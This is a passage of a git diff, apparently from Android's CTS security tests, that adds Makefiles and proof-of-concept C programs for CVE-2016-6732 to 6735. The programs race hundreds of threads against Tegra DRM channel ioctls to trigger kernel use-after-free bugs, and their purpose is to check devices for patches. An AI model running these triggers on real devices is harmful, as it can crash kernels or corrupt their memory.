+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
